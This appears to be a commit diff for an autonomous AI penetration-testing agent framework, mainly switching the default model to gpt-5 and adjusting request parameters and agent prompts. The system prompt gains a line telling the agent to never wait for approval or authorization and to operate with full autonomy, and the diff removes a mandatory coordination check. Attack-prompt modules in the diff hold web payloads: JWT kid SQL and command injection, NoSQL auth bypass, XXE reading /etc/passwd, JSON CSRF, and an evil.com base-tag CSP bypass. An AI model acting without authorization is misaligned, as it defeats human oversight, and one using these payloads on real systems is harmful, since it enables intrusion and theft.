Adding full support for gpt-5 models (#5)
This commit is contained in:
@@ -28,6 +28,7 @@ USER INTERACTION:
|
||||
PRIORITIZE USER INSTRUCTIONS:
|
||||
- User instructions override all default approaches
|
||||
- Follow user-specified scope, targets, and methodologies precisely
|
||||
- NEVER wait for approval or authorization - operate with full autonomy
|
||||
|
||||
AGGRESSIVE SCANNING MANDATE:
|
||||
- GO SUPER HARD on all targets - no shortcuts
|
||||
@@ -143,206 +144,12 @@ Remember: A single high-impact vulnerability is worth more than dozens of low-se
|
||||
</vulnerability_focus>
|
||||
|
||||
<multi_agent_system>
|
||||
AGENT ENVIRONMENTS:
|
||||
- Each agent has isolated: browser, terminal, proxy, /workspace
|
||||
- Shared access to /shared_workspace for collaboration
|
||||
- Use /shared_workspace to pass files between agents
|
||||
|
||||
AGENT HIERARCHY TREE EXAMPLES:
|
||||
|
||||
EXAMPLE 1 - BLACK-BOX Web Application Assessment (domain/URL only):
|
||||
```
|
||||
Root Agent (Coordination)
|
||||
├── Recon Agent
|
||||
│ ├── Subdomain Discovery Agent
|
||||
│ │ ├── DNS Bruteforce Agent (finds api.target.com, admin.target.com)
|
||||
│ │ ├── Certificate Transparency Agent (finds dev.target.com, staging.target.com)
|
||||
│ │ └── ASN Enumeration Agent (finds additional IP ranges)
|
||||
│ ├── Port Scanning Agent
|
||||
│ │ ├── TCP Port Agent (finds 22, 80, 443, 8080, 9200)
|
||||
│ │ ├── UDP Port Agent (finds 53, 161, 1900)
|
||||
│ │ └── Service Version Agent (identifies nginx 1.18, elasticsearch 7.x)
|
||||
│ └── Tech Stack Analysis Agent
|
||||
│ ├── WAF Detection Agent (identifies Cloudflare, custom rules)
|
||||
│ ├── CMS Detection Agent (finds WordPress 5.8.1, plugins)
|
||||
│ └── Framework Detection Agent (detects React frontend, Laravel backend)
|
||||
├── API Discovery Agent (spawned after finding api.target.com)
|
||||
│ ├── GraphQL Endpoint Agent
|
||||
│ │ ├── Introspection Validation Agent
|
||||
│ │ │ └── GraphQL Schema Reporting Agent
|
||||
│ │ └── Query Complexity Validation Agent (no findings - properly protected)
|
||||
│ ├── REST API Agent
|
||||
│ │ ├── IDOR Testing Agent (user profiles)
|
||||
│ │ │ ├── IDOR Validation Agent (/api/users/123 → /api/users/124)
|
||||
│ │ │ │ └── IDOR Reporting Agent (PII exposure)
|
||||
│ │ │ └── IDOR Validation Agent (/api/orders/456 → /api/orders/789)
|
||||
│ │ │ └── IDOR Reporting Agent (financial data access)
|
||||
│ │ └── Business Logic Agent
|
||||
│ │ ├── Price Manipulation Validation Agent (validation failed - server-side controls working)
|
||||
│ │ └── Discount Code Validation Agent
|
||||
│ │ └── Coupon Abuse Reporting Agent
|
||||
│ └── JWT Security Agent
|
||||
│ ├── Algorithm Confusion Validation Agent
|
||||
│ │ └── JWT Bypass Reporting Agent
|
||||
│ └── Secret Bruteforce Validation Agent (not valid - strong secret used)
|
||||
├── Admin Panel Agent (spawned after finding admin.target.com)
|
||||
│ ├── Authentication Bypass Agent
|
||||
│ │ ├── Default Credentials Validation Agent (no findings - no default creds)
|
||||
│ │ └── SQL Injection Validation Agent (login form)
|
||||
│ │ └── Auth Bypass Reporting Agent
|
||||
│ └── File Upload Agent
|
||||
│ ├── WebShell Upload Validation Agent
|
||||
│ │ └── RCE via Upload Reporting Agent
|
||||
│ └── Path Traversal Validation Agent (validation failed - proper filtering detected)
|
||||
├── WordPress Agent (spawned after CMS detection)
|
||||
│ ├── Plugin Vulnerability Agent
|
||||
│ │ ├── Contact Form 7 SQLi Validation Agent
|
||||
│ │ │ └── DB Compromise Reporting Agent
|
||||
│ │ └── WooCommerce XSS Validation Agent (validation failed - false positive from scanner)
|
||||
│ └── Theme Vulnerability Agent
|
||||
│ └── LFI Validation Agent (theme editor) (no findings - theme editor disabled)
|
||||
└── Infrastructure Agent (spawned after finding Elasticsearch)
|
||||
├── Elasticsearch Agent
|
||||
│ ├── Open Index Validation Agent
|
||||
│ │ └── Data Exposure Reporting Agent
|
||||
│ └── Script Injection Validation Agent (validation failed - script execution disabled)
|
||||
└── Docker Registry Agent (spawned if found) (no findings - registry not accessible)
|
||||
```
|
||||
|
||||
EXAMPLE 2 - WHITE-BOX Code Security Review (source code provided):
|
||||
```
|
||||
Root Agent (Coordination)
|
||||
├── Static Analysis Agent
|
||||
│ ├── Authentication Code Agent
|
||||
│ │ ├── JWT Implementation Validation Agent
|
||||
│ │ │ └── JWT Weak Secret Reporting Agent
|
||||
│ │ │ └── JWT Secure Implementation Fixing Agent
|
||||
│ │ ├── Session Management Validation Agent
|
||||
│ │ │ └── Session Fixation Reporting Agent
|
||||
│ │ │ └── Session Security Fixing Agent
|
||||
│ │ └── Password Policy Validation Agent
|
||||
│ │ └── Weak Password Rules Reporting Agent
|
||||
│ │ └── Strong Password Policy Fixing Agent
|
||||
│ ├── Input Validation Agent
|
||||
│ │ ├── SQL Query Analysis Validation Agent
|
||||
│ │ │ ├── Prepared Statement Validation Agent
|
||||
│ │ │ │ └── SQLi Risk Reporting Agent
|
||||
│ │ │ │ └── Parameterized Query Fixing Agent
|
||||
│ │ │ └── Dynamic Query Validation Agent
|
||||
│ │ │ └── Query Injection Reporting Agent
|
||||
│ │ │ └── Query Builder Fixing Agent
|
||||
│ │ ├── XSS Prevention Validation Agent
|
||||
│ │ │ └── Output Encoding Validation Agent
|
||||
│ │ │ └── XSS Vulnerability Reporting Agent
|
||||
│ │ │ └── Output Sanitization Fixing Agent
|
||||
│ │ └── File Upload Validation Agent
|
||||
│ │ ├── MIME Type Validation Agent
|
||||
│ │ │ └── File Type Bypass Reporting Agent
|
||||
│ │ │ └── Proper MIME Check Fixing Agent
|
||||
│ │ └── Path Traversal Validation Agent
|
||||
│ │ └── Directory Traversal Reporting Agent
|
||||
│ │ └── Path Sanitization Fixing Agent
|
||||
│ ├── Business Logic Agent
|
||||
│ │ ├── Race Condition Analysis Agent
|
||||
│ │ │ ├── Payment Race Validation Agent
|
||||
│ │ │ │ └── Financial Race Reporting Agent
|
||||
│ │ │ │ └── Atomic Transaction Fixing Agent
|
||||
│ │ │ └── Account Creation Race Validation Agent (validation failed - proper locking found)
|
||||
│ │ ├── Authorization Logic Agent
|
||||
│ │ │ ├── IDOR Prevention Validation Agent
|
||||
│ │ │ │ └── Access Control Bypass Reporting Agent
|
||||
│ │ │ │ └── Authorization Check Fixing Agent
|
||||
│ │ │ └── Privilege Escalation Validation Agent (no findings - RBAC properly implemented)
|
||||
│ │ └── Financial Logic Agent
|
||||
│ │ ├── Price Manipulation Validation Agent (no findings - server-side validation secure)
|
||||
│ │ └── Discount Logic Validation Agent
|
||||
│ │ └── Discount Abuse Reporting Agent
|
||||
│ │ └── Discount Validation Fixing Agent
|
||||
│ └── Cryptography Agent
|
||||
│ ├── Encryption Implementation Agent
|
||||
│ │ ├── AES Usage Validation Agent
|
||||
│ │ │ └── Weak Encryption Reporting Agent
|
||||
│ │ │ └── Strong Crypto Fixing Agent
|
||||
│ │ └── Key Management Validation Agent
|
||||
│ │ └── Hardcoded Key Reporting Agent
|
||||
│ │ └── Secure Key Storage Fixing Agent
|
||||
│ └── Hash Function Agent
|
||||
│ └── Password Hashing Validation Agent
|
||||
│ └── Weak Hash Reporting Agent
|
||||
│ └── bcrypt Implementation Fixing Agent
|
||||
├── Dynamic Testing Agent
|
||||
│ ├── Server Setup Agent
|
||||
│ │ ├── Environment Setup Validation Agent (sets up on port 8080)
|
||||
│ │ ├── Database Setup Validation Agent (initializes test DB)
|
||||
│ │ └── Service Health Validation Agent (confirms running state)
|
||||
│ ├── Runtime SQL Injection Agent
|
||||
│ │ ├── Login Form SQLi Validation Agent
|
||||
│ │ │ └── Auth Bypass SQLi Reporting Agent
|
||||
│ │ │ └── Login Security Fixing Agent
|
||||
│ │ ├── Search Function SQLi Validation Agent
|
||||
│ │ │ └── Data Extraction SQLi Reporting Agent
|
||||
│ │ │ └── Search Sanitization Fixing Agent
|
||||
│ │ └── API Parameter SQLi Validation Agent
|
||||
│ │ └── API SQLi Reporting Agent
|
||||
│ │ └── API Input Validation Fixing Agent
|
||||
│ ├── XSS Testing Agent
|
||||
│ │ ├── Stored XSS Validation Agent (comment system)
|
||||
│ │ │ └── Persistent XSS Reporting Agent
|
||||
│ │ │ └── Input Filtering Fixing Agent
|
||||
│ │ ├── Reflected XSS Validation Agent (search results) (validation failed - output properly encoded)
|
||||
│ │ └── DOM XSS Validation Agent (client-side routing)
|
||||
│ │ └── DOM XSS Reporting Agent
|
||||
│ │ └── Client Sanitization Fixing Agent
|
||||
│ ├── Business Logic Testing Agent
|
||||
│ │ ├── Payment Flow Validation Agent
|
||||
│ │ │ ├── Negative Amount Validation Agent
|
||||
│ │ │ │ └── Payment Bypass Reporting Agent
|
||||
│ │ │ │ └── Amount Validation Fixing Agent
|
||||
│ │ │ └── Currency Manipulation Validation Agent
|
||||
│ │ │ └── Currency Fraud Reporting Agent
|
||||
│ │ │ └── Currency Lock Fixing Agent
|
||||
│ │ ├── User Registration Validation Agent
|
||||
│ │ │ └── Email Verification Bypass Validation Agent
|
||||
│ │ │ └── Email Security Reporting Agent
|
||||
│ │ │ └── Verification Enforcement Fixing Agent
|
||||
│ │ └── File Processing Validation Agent
|
||||
│ │ ├── XXE Attack Validation Agent
|
||||
│ │ │ └── XML Entity Reporting Agent
|
||||
│ │ │ └── XML Security Fixing Agent
|
||||
│ │ └── Deserialization Validation Agent
|
||||
│ │ └── Object Injection Reporting Agent
|
||||
│ │ └── Safe Deserialization Fixing Agent
|
||||
│ └── API Security Testing Agent
|
||||
│ ├── GraphQL Security Agent
|
||||
│ │ ├── Query Depth Validation Agent
|
||||
│ │ │ └── DoS Attack Reporting Agent
|
||||
│ │ │ └── Query Limiting Fixing Agent
|
||||
│ │ └── Schema Introspection Validation Agent (no findings - introspection disabled in production)
|
||||
│ └── REST API Agent
|
||||
│ ├── Rate Limiting Validation Agent (validation failed - rate limiting working properly)
|
||||
│ └── CORS Validation Agent
|
||||
│ └── Origin Bypass Reporting Agent
|
||||
│ └── CORS Policy Fixing Agent
|
||||
└── Infrastructure Code Agent
|
||||
├── Docker Security Agent
|
||||
│ ├── Dockerfile Analysis Validation Agent
|
||||
│ │ └── Container Privilege Reporting Agent
|
||||
│ │ └── Secure Container Fixing Agent
|
||||
│ └── Secret Management Validation Agent
|
||||
│ └── Hardcoded Secret Reporting Agent
|
||||
│ └── Secret Externalization Fixing Agent
|
||||
├── CI/CD Pipeline Agent
|
||||
│ └── Pipeline Security Validation Agent
|
||||
│ └── Pipeline Injection Reporting Agent
|
||||
│ └── Pipeline Hardening Fixing Agent
|
||||
└── Cloud Configuration Agent
|
||||
├── AWS Config Validation Agent
|
||||
│ └── S3 Bucket Exposure Reporting Agent
|
||||
│ └── Bucket Security Fixing Agent
|
||||
└── K8s Config Validation Agent
|
||||
└── Pod Security Reporting Agent
|
||||
└── Security Context Fixing Agent
|
||||
```
|
||||
AGENT ISOLATION & SANDBOXING:
|
||||
- Each subagent runs in a completely isolated sandbox environment
|
||||
- Each agent has its own: browser sessions, terminal sessions, proxy (history and scope rules), /workspace directory, environment variables, running processes
|
||||
- Agents cannot share network ports or interfere with each other's processes
|
||||
- Only shared resource is /shared_workspace for collaboration and file exchange
|
||||
- Use /shared_workspace to pass files, reports, and coordination data between agents
|
||||
|
||||
SIMPLE WORKFLOW RULES:
|
||||
|
||||
@@ -423,7 +230,7 @@ Tool calls use XML format:
|
||||
CRITICAL RULES:
|
||||
1. One tool call per message
|
||||
2. Tool call must be last in message
|
||||
3. End response after </function> tag
|
||||
3. End response after </function> tag. It's your stop word. Do not continue after it.
|
||||
5. Thinking is NOT optional - it's required for reasoning and success
|
||||
|
||||
SPRAYING EXECUTION NOTE:
|
||||
|
||||
+7
-7
@@ -8,11 +8,11 @@ import asyncio
|
||||
import logging
|
||||
import os
|
||||
import secrets
|
||||
import shutil
|
||||
import sys
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
from urllib.parse import urlparse
|
||||
import shutil
|
||||
|
||||
import docker
|
||||
import litellm
|
||||
@@ -74,7 +74,7 @@ def validate_environment() -> None:
|
||||
error_text.append("• ", style="white")
|
||||
error_text.append("STRIX_LLM", style="bold cyan")
|
||||
error_text.append(
|
||||
" - Model name to use with litellm (e.g., 'anthropic/claude-opus-4-1-20250805')\n",
|
||||
" - Model name to use with litellm (e.g., 'openai/gpt-5')\n",
|
||||
style="white",
|
||||
)
|
||||
error_text.append("• ", style="white")
|
||||
@@ -91,9 +91,7 @@ def validate_environment() -> None:
|
||||
)
|
||||
|
||||
error_text.append("\nExample setup:\n", style="white")
|
||||
error_text.append(
|
||||
"export STRIX_LLM='anthropic/claude-opus-4-1-20250805'\n", style="dim white"
|
||||
)
|
||||
error_text.append("export STRIX_LLM='openai/gpt-5'\n", style="dim white")
|
||||
error_text.append("export LLM_API_KEY='your-api-key-here'\n", style="dim white")
|
||||
if missing_optional_vars:
|
||||
error_text.append(
|
||||
@@ -127,7 +125,9 @@ def check_docker_installed() -> None:
|
||||
error_text.append("DOCKER NOT INSTALLED", style="bold red")
|
||||
error_text.append("\n\n", style="white")
|
||||
error_text.append("The 'docker' CLI was not found in your PATH.\n", style="white")
|
||||
error_text.append("Please install Docker and ensure the 'docker' command is available.\n\n", style="white")
|
||||
error_text.append(
|
||||
"Please install Docker and ensure the 'docker' command is available.\n\n", style="white"
|
||||
)
|
||||
|
||||
panel = Panel(
|
||||
error_text,
|
||||
@@ -144,7 +144,7 @@ async def warm_up_llm() -> None:
|
||||
console = Console()
|
||||
|
||||
try:
|
||||
model_name = os.getenv("STRIX_LLM", "anthropic/claude-opus-4-1-20250805")
|
||||
model_name = os.getenv("STRIX_LLM", "openai/gpt-5")
|
||||
api_key = os.getenv("LLM_API_KEY")
|
||||
|
||||
if api_key:
|
||||
|
||||
+1
-1
@@ -9,7 +9,7 @@ class LLMConfig:
|
||||
enable_prompt_caching: bool = True,
|
||||
prompt_modules: list[str] | None = None,
|
||||
):
|
||||
self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-opus-4-1-20250805")
|
||||
self.model_name = model_name or os.getenv("STRIX_LLM", "openai/gpt-5")
|
||||
|
||||
if not self.model_name:
|
||||
raise ValueError("STRIX_LLM environment variable must be set and not empty")
|
||||
|
||||
+66
-2
@@ -28,6 +28,39 @@ api_key = os.getenv("LLM_API_KEY")
|
||||
if api_key:
|
||||
litellm.api_key = api_key
|
||||
|
||||
MODELS_WITHOUT_STOP_WORDS = [
|
||||
"gpt-5",
|
||||
"gpt-5-mini",
|
||||
"gpt-5-nano",
|
||||
"o1-mini",
|
||||
"o1-preview",
|
||||
"o1",
|
||||
"o1-2024-12-17",
|
||||
"o3",
|
||||
"o3-2025-04-16",
|
||||
"o3-mini-2025-01-31",
|
||||
"o3-mini",
|
||||
"o4-mini",
|
||||
"o4-mini-2025-04-16",
|
||||
"grok-4-0709",
|
||||
]
|
||||
|
||||
REASONING_EFFORT_SUPPORTED_MODELS = [
|
||||
"gpt-5",
|
||||
"gpt-5-mini",
|
||||
"gpt-5-nano",
|
||||
"o1-2024-12-17",
|
||||
"o1",
|
||||
"o3",
|
||||
"o3-2025-04-16",
|
||||
"o3-mini-2025-01-31",
|
||||
"o3-mini",
|
||||
"o4-mini",
|
||||
"o4-mini-2025-04-16",
|
||||
"gemini-2.5-flash",
|
||||
"gemini-2.5-pro",
|
||||
]
|
||||
|
||||
|
||||
class StepRole(str, Enum):
|
||||
AGENT = "agent"
|
||||
@@ -240,17 +273,48 @@ class LLM:
|
||||
"supported": supports_prompt_caching(self.config.model_name),
|
||||
}
|
||||
|
||||
def _should_include_stop_param(self) -> bool:
|
||||
if not self.config.model_name:
|
||||
return True
|
||||
|
||||
actual_model_name = self.config.model_name.split("/")[-1].lower()
|
||||
model_name_lower = self.config.model_name.lower()
|
||||
|
||||
return not any(
|
||||
actual_model_name == unsupported_model.lower()
|
||||
or model_name_lower == unsupported_model.lower()
|
||||
for unsupported_model in MODELS_WITHOUT_STOP_WORDS
|
||||
)
|
||||
|
||||
def _should_include_reasoning_effort(self) -> bool:
|
||||
if not self.config.model_name:
|
||||
return False
|
||||
|
||||
actual_model_name = self.config.model_name.split("/")[-1].lower()
|
||||
model_name_lower = self.config.model_name.lower()
|
||||
|
||||
return any(
|
||||
actual_model_name == supported_model.lower()
|
||||
or model_name_lower == supported_model.lower()
|
||||
for supported_model in REASONING_EFFORT_SUPPORTED_MODELS
|
||||
)
|
||||
|
||||
async def _make_request(
|
||||
self,
|
||||
messages: list[dict[str, Any]],
|
||||
) -> ModelResponse:
|
||||
completion_args = {
|
||||
completion_args: dict[str, Any] = {
|
||||
"model": self.config.model_name,
|
||||
"messages": messages,
|
||||
"temperature": self.config.temperature,
|
||||
"stop": ["</function>"],
|
||||
}
|
||||
|
||||
if self._should_include_stop_param():
|
||||
completion_args["stop"] = ["</function>"]
|
||||
|
||||
if self._should_include_reasoning_effort():
|
||||
completion_args["reasoning_effort"] = "medium"
|
||||
|
||||
queue = get_global_queue()
|
||||
response = await queue.make_request(completion_args)
|
||||
|
||||
|
||||
@@ -145,7 +145,7 @@ class MemoryCompressor:
|
||||
model_name: str | None = None,
|
||||
):
|
||||
self.max_images = max_images
|
||||
self.model_name = model_name or os.getenv("STRIX_LLM", "anthropic/claude-opus-4-1-20250805")
|
||||
self.model_name = model_name or os.getenv("STRIX_LLM", "openai/gpt-5")
|
||||
|
||||
if not self.model_name:
|
||||
raise ValueError("STRIX_LLM environment variable must be set and not empty")
|
||||
|
||||
@@ -49,25 +49,21 @@ def generate_modules_description() -> str:
|
||||
if not available_modules:
|
||||
return "No prompt modules available"
|
||||
|
||||
description_parts = []
|
||||
all_module_names = get_all_module_names()
|
||||
|
||||
for category, modules in available_modules.items():
|
||||
modules_str = ", ".join(modules)
|
||||
description_parts.append(f"{category} ({modules_str})")
|
||||
if not all_module_names:
|
||||
return "No prompt modules available"
|
||||
|
||||
sorted_modules = sorted(all_module_names)
|
||||
modules_str = ", ".join(sorted_modules)
|
||||
|
||||
description = (
|
||||
f"List of prompt modules to load for this agent (max 3). "
|
||||
f"Available modules: {', '.join(description_parts)}. "
|
||||
f"List of prompt modules to load for this agent (max 3). Available modules: {modules_str}. "
|
||||
)
|
||||
|
||||
example_modules = []
|
||||
for modules in available_modules.values():
|
||||
example_modules.extend(modules[:2])
|
||||
if len(example_modules) >= 2:
|
||||
break
|
||||
|
||||
example_modules = sorted_modules[:2]
|
||||
if example_modules:
|
||||
example = f"Example: {example_modules[:2]} for specialized agent"
|
||||
example = f"Example: {', '.join(example_modules)} for specialized agent"
|
||||
description += example
|
||||
|
||||
return description
|
||||
|
||||
@@ -5,8 +5,8 @@
|
||||
|
||||
<jwt_structure>
|
||||
header.payload.signature
|
||||
- Header: {"alg":"HS256","typ":"JWT"}
|
||||
- Payload: {"sub":"1234","name":"John","iat":1516239022}
|
||||
- Header: {% raw %}{"alg":"HS256","typ":"JWT"}{% endraw %}
|
||||
- Payload: {% raw %}{"sub":"1234","name":"John","iat":1516239022}{% endraw %}
|
||||
- Signature: HMACSHA256(base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)
|
||||
</jwt_structure>
|
||||
|
||||
@@ -19,7 +19,7 @@ RS256 to HS256:
|
||||
</algorithm_confusion>
|
||||
|
||||
<none_algorithm>
|
||||
- Set "alg": "none" in header
|
||||
- Set {% raw %}"alg": "none"{% endraw %} in header
|
||||
- Remove signature completely (keep the trailing dot)
|
||||
</none_algorithm>
|
||||
|
||||
@@ -28,16 +28,16 @@ Common secrets: 'secret', 'password', '123456', 'key', 'jwt_secret', 'your-256-b
|
||||
</weak_secrets>
|
||||
|
||||
<kid_manipulation>
|
||||
- SQL Injection: "kid": "key' UNION SELECT 'secret'--"
|
||||
- Command injection: "kid": "|sleep 10"
|
||||
- Path traversal: "kid": "../../../../../../dev/null"
|
||||
- SQL Injection: {% raw %}"kid": "key' UNION SELECT 'secret'--"{% endraw %}
|
||||
- Command injection: {% raw %}"kid": "|sleep 10"{% endraw %}
|
||||
- Path traversal: {% raw %}"kid": "../../../../../../dev/null"{% endraw %}
|
||||
</kid_manipulation>
|
||||
</common_attacks>
|
||||
|
||||
<advanced_techniques>
|
||||
<jwk_injection>
|
||||
Embed public key in token header:
|
||||
{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}
|
||||
{% raw %}{"jwk": {"kty": "RSA", "n": "your-public-key-n", "e": "AQAB"}}{% endraw %}
|
||||
</jwk_injection>
|
||||
|
||||
<jku_manipulation>
|
||||
|
||||
@@ -48,7 +48,7 @@ HTML form auto-submit:
|
||||
<json_csrf>
|
||||
For JSON endpoints:
|
||||
<form enctype="text/plain" action="https://target.com/api">
|
||||
<input name='{"amount":1000,"to":"attacker","ignore":"' value='"}'>
|
||||
<input name='{% raw %}{"amount":1000,"to":"attacker","ignore":"{% endraw %}' value='"}'>
|
||||
</form>
|
||||
</json_csrf>
|
||||
|
||||
|
||||
@@ -15,7 +15,7 @@
|
||||
|
||||
<advanced_enumeration>
|
||||
- Boundary values: 0, -1, null, empty string, max int
|
||||
- Different formats: {"id":123} vs {"id":"123"}
|
||||
- Different formats: {% raw %}{"id":123} vs {"id":"123"}{% endraw %}
|
||||
- ID patterns: increment, decrement, similar patterns
|
||||
- Wildcard testing: *, %, _, all
|
||||
- Array notation: id[]=123&id[]=456
|
||||
@@ -51,7 +51,7 @@ for i in range(1, 10000):
|
||||
<type_confusion>
|
||||
- String where int expected: "123" vs 123
|
||||
- Array where single value expected: [123] vs 123
|
||||
- Object injection: {"id": {"$ne": null}}
|
||||
- Object injection: {% raw %}{"id": {"$ne": null}}{% endraw %}
|
||||
</type_confusion>
|
||||
</exploitation_techniques>
|
||||
|
||||
@@ -106,7 +106,7 @@ query { u1: user(id: 123) { data } u2: user(id: 456) { data } }
|
||||
|
||||
<websocket_idor>
|
||||
Subscribe to other users' channels:
|
||||
{"subscribe": "user_456_notifications"}
|
||||
{% raw %}{"subscribe": "user_456_notifications"}{% endraw %}
|
||||
</websocket_idor>
|
||||
|
||||
<file_path_idor>
|
||||
|
||||
@@ -94,7 +94,7 @@ ${IFS}id
|
||||
<polyglot_payloads>
|
||||
Works in multiple contexts:
|
||||
;id;#' |id| #" |id| #
|
||||
${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}
|
||||
{% raw %}${{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}{% endraw %}
|
||||
</polyglot_payloads>
|
||||
|
||||
<blind_rce>
|
||||
|
||||
@@ -152,9 +152,9 @@ PostgreSQL:
|
||||
|
||||
<nosql_injection>
|
||||
<mongodb>
|
||||
{"username": {"$ne": null}, "password": {"$ne": null}}
|
||||
{"$where": "this.username == 'admin'"}
|
||||
{"username": {"$regex": "^admin"}}
|
||||
{% raw %}{"username": {"$ne": null}, "password": {"$ne": null}}{% endraw %}
|
||||
{% raw %}{"$where": "this.username == 'admin'"}{% endraw %}
|
||||
{% raw %}{"username": {"$regex": "^admin"}}{% endraw %}
|
||||
</mongodb>
|
||||
|
||||
<graphql>
|
||||
|
||||
@@ -9,7 +9,7 @@
|
||||
- Headers: User-Agent, Referer, X-Forwarded-For
|
||||
- Cookies (if reflected)
|
||||
- File uploads (filename, metadata)
|
||||
- JSON endpoints: {"user":"<payload>"}
|
||||
- JSON endpoints: {% raw %}{"user":"<payload>"}{% endraw %}
|
||||
- postMessage handlers
|
||||
- DOM properties: location.hash, document.referrer
|
||||
- WebSocket messages
|
||||
@@ -97,7 +97,7 @@ jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</
|
||||
|
||||
<csp_bypasses>
|
||||
- JSONP endpoints: <script src="//site.com/jsonp?callback=alert">
|
||||
- AngularJS: {{constructor.constructor('alert(1)')()}}
|
||||
- AngularJS: {% raw %}{{constructor.constructor('alert(1)')()}}{% endraw %}
|
||||
- Script gadgets in allowed libraries
|
||||
- Base tag injection: <base href="//evil.com/">
|
||||
- Object/embed: <object data="data:text/html,<script>alert(1)</script>">
|
||||
@@ -145,7 +145,7 @@ navigator.mediaDevices.getUserMedia({video:true}).then(s=>...)
|
||||
</markdown>
|
||||
|
||||
<react_vue>
|
||||
- dangerouslySetInnerHTML={{__html: payload}}
|
||||
- dangerouslySetInnerHTML={% raw %}{{__html: payload}}{% endraw %}
|
||||
- v-html directive bypass
|
||||
</react_vue>
|
||||
|
||||
|
||||
@@ -91,7 +91,7 @@ evil.dtd:
|
||||
|
||||
<specific_contexts>
|
||||
<json_xxe>
|
||||
{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}
|
||||
{% raw %}{"name": "test", "content": "<?xml version='1.0'?><!DOCTYPE foo [<!ENTITY xxe SYSTEM 'file:///etc/passwd'>]><x>&xxe;</x>"}{% endraw %}
|
||||
</json_xxe>
|
||||
|
||||
<soap_xxe>
|
||||
|
||||
@@ -57,6 +57,10 @@ def _run_agent_in_thread(
|
||||
- Work independently with your own approach
|
||||
- Use agent_finish when complete to report back to parent
|
||||
- You are a SPECIALIST for this specific task
|
||||
- The previous browser, sessions, proxy history, and files in /workspace were for your
|
||||
parent agent. Do not depend on them.
|
||||
- You are starting with a fresh context. Fresh proxy, browser, and files.
|
||||
Only stuff in /shared_workspace is passed to you from context.
|
||||
</instructions>
|
||||
</agent_delegation>"""
|
||||
|
||||
@@ -192,16 +196,6 @@ def create_agent(
|
||||
if prompt_modules:
|
||||
module_list = [m.strip() for m in prompt_modules.split(",") if m.strip()]
|
||||
|
||||
if "root_agent" in module_list:
|
||||
return {
|
||||
"success": False,
|
||||
"error": (
|
||||
"The 'root_agent' module is reserved for the main agent "
|
||||
"and cannot be used by sub-agents"
|
||||
),
|
||||
"agent_id": None,
|
||||
}
|
||||
|
||||
if len(module_list) > 3:
|
||||
return {
|
||||
"success": False,
|
||||
|
||||
@@ -59,7 +59,7 @@ Use this tool when:
|
||||
<tool name="create_agent">
|
||||
<description>Create and spawn a new agent to handle a specific subtask.
|
||||
|
||||
MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any new agent to check if there is already an agent working on the same or similar task. Only create a new agent if no existing agent is handling the specific task.</description>
|
||||
Only create a new agent if no existing agent is handling the specific task.</description>
|
||||
<details>The new agent inherits the parent's conversation history and context up to the point
|
||||
of creation, then continues with its assigned subtask. This enables decomposition
|
||||
of complex penetration testing tasks into specialized sub-agents.
|
||||
@@ -67,12 +67,6 @@ MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any
|
||||
The agent runs asynchronously and independently, allowing the parent to continue
|
||||
immediately while the new agent executes its task in the background.
|
||||
|
||||
CRITICAL: Before calling this tool, you MUST first use view_agent_graph to:
|
||||
- Examine all existing agents and their current tasks
|
||||
- Verify no agent is already working on the same or similar objective
|
||||
- Avoid duplication of effort and resource waste
|
||||
- Ensure efficient coordination across the multi-agent system
|
||||
|
||||
If you as a parent agent don't absolutely have anything to do while your subagents are running, you can use wait_for_message tool. The subagent will continue to run in the background, and update you when it's done.
|
||||
</details>
|
||||
<parameters>
|
||||
@@ -93,9 +87,6 @@ MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any
|
||||
<description>Response containing: - agent_id: Unique identifier for the created agent - success: Whether the agent was created successfully - message: Status message - agent_info: Details about the created agent</description>
|
||||
</returns>
|
||||
<examples>
|
||||
# REQUIRED: First check agent graph before creating any new agent
|
||||
<function=view_agent_graph>
|
||||
</function>
|
||||
# REQUIRED: Check agent graph again before creating another agent
|
||||
<function=view_agent_graph>
|
||||
</function>
|
||||
@@ -108,7 +99,6 @@ MANDATORY REQUIREMENT: You MUST call view_agent_graph FIRST before creating any
|
||||
<parameter=prompt_modules>sql_injection</parameter>
|
||||
</function>
|
||||
|
||||
# Create specialized authentication testing agent with multiple modules (comma-separated)
|
||||
<function=create_agent>
|
||||
<parameter=task>Test authentication mechanisms, JWT implementation, and session management
|
||||
for security vulnerabilities and bypass techniques.</parameter>
|
||||
|
||||
@@ -63,6 +63,10 @@
|
||||
- When you need multiple characters sent as a single unit
|
||||
12. Do NOT use terminal actions for file editing or writing. Use the replace_in_file,
|
||||
write_to_file, or read_file tools instead.
|
||||
13. PREFER SIMPLE COMMANDS: Avoid complex multiline commands with nested quotes or
|
||||
complex syntax. Break down complex operations into simpler, individual commands
|
||||
for better reliability and readability. Never send multiple commands in a single
|
||||
input list with multiple "Enter" keys - execute one command at a time instead.
|
||||
</notes>
|
||||
<examples>
|
||||
# Create new terminal with Node.js (default terminal)
|
||||
|
||||
Reference in New Issue
Block a user